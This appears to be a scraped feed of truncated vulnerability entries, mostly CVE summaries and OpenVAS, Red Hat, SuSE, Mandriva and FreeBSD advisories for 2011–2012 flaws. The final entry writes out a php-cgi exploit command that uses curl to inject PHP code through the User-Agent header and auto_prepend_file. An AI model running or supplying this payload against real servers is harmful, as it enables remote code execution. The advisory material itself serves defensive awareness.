CVE-2012-2493

Cisco AnyConnect Secure Mobility Client is affected by CVE-2012-2493 due to a vulnerable WebLaunch VPN downloader that does not properly validate downloaded binaries. This allows remote code execution via ActiveX or Java components. Affected products include Windows 2.x builds before 2.5 MR6, and...

CVE-2012-2635

The Dolphin Browser HD application before 7.6 and Dolphin for Pad application before 1.0.1 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application...

Ubuntu Update for linux-lts-backport-natty USN-1470-1

Ubuntu Update for Linux kernel vulnerabilities USN-1470-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN14701.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for linux-lts-backport-natty USN-1470-1 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH,...

Mandriva Linux Security Advisory : php (MDVSA-2012:093)

Multiple vulnerabilities has been identified and fixed in php : There is a programming error in the DES implementation used in crypt in ext/standard/cryptfreesec.c when handling input which contains characters that can not be represented with 7-bit ASCII. When the input contains characters with...

PHP 5.3.x < 5.3.14 Multiple Vulnerabilities

According to its banner, the version of PHP installed on the remote host is 5.3.x earlier than 5.3.14, and is, therefore, potentially affected the following vulnerabilities : - An integer overflow error exists in the function 'pharparsetarfile' in the file 'ext/phar/tar.c'. This error can lead to...

Cross site scripting

Cross-site scripting XSS vulnerability in the SIP implementation on the Cisco SPA8000 and SPA8800 before 6.1.11, SPA2102 and SPA3102 before 5.2.13, and SPA 500 series IP phones before 7.4.9 allows remote attackers to inject arbitrary web script or HTML via the FROM field of an INVITE message, aka...

Design/Logic Flaw

The nfs4getacluncached function in fs/nfs/nfs4proc.c in the NFSv4 implementation in the Linux kernel before 3.3.2 uses an incorrect length variable during a copy operation, which allows remote NFS servers to cause a denial of service OOPS by sending an excessive number of bitmap words in an...

CVE-2012-2375

The nfs4getacluncached function in fs/nfs/nfs4proc.c in the NFSv4 implementation in the Linux kernel before 3.3.2 uses an incorrect length variable during a copy operation, which allows remote NFS servers to cause a denial of service OOPS by sending an excessive number of bitmap words in an...

Important: Red Hat Security Advisory: kernel security and bug fix update

Updated kernel packages that fix two security issues and multiple bugs are now available for Red Hat Enterprise Linux 5.6 Extended Update Support. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System CVSS base scores,...

Ubuntu Update for firefox USN-1463-1

Ubuntu Update for Linux kernel vulnerabilities USN-1463-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN14631.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for firefox USN-1463-1 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This...

RedHat Update for Red Hat Enterprise Linux 6.1 kernel RHSA-2011:0542-01

Check for the Version of Red Hat Enterprise Linux 6.1 kernel OpenVAS Vulnerability Test RedHat Update for Red Hat Enterprise Linux 6.1 kernel RHSA-2011:0542-01 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free...

Cross site scripting

The Content Security Policy CSP implementation in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 does not block inline event handlers, which makes it easier for remote attackers to condu...

Memory corruption

The glBufferData function in the WebGL implementation in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 does not properly mitigate an unspecified flaw in an NVIDIA driver, which allows...

FreeBSD crypt&#40;&#41; implementation vulnerability

8-bit characters are ignored during DES hash calculation...

FreeBSD -- Incorrect crypt() hashing

Problem description: There is a programming error in the DES implementation used in crypt when handling input which contains characters that cannot be represented with 7-bit ASCII. When the input contains characters with only the most significant bit set 0x80, that character and all characters...

CVE-2011-3109

Google Chrome before 19.0.1084.52 on Linux does not properly perform a cast of an unspecified variable, which allows remote attackers to cause a denial of service or possibly have unknown other impact by leveraging an error in the GTK implementation of the UI...

CVE-2011-4131

The NFSv4 implementation in the Linux kernel before 3.2.2 does not properly handle bitmap sizes in GETACL replies, which allows remote NFS servers to cause a denial of service OOPS by sending an excessive number of bitmap words...

SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 2393)

This kernel update fixes the following security problems : - A bug within the UDF filesystem that caused machine hangs when truncating files on the filesystem was fixed. 186226. CVE-2006-4145 - A potential crash when receiving IPX packets was fixed. This problem is thought not to be exploitable...

CVE-2011-3092

CVE-2011-3092 : The Google V8 regex implementation (as used by Google Chrome prior to 19.0.1084.46) contains an invalid write in the regex engine, enabling a remote attacker to cause a denial of service. The description notes possible unspecified additional impact; no exploit vectors are detailed...

php-cgi exploit EXP-vulnerability warning-the black bar safety net

1, local contains direct code execution: curl-H "USER-AGENT: ? system'id';die;?& gt;" http://target.com/test.php?-dautoprependfile%3d/proc/self/environ+-n 2, The remote contains the implementation code: curl...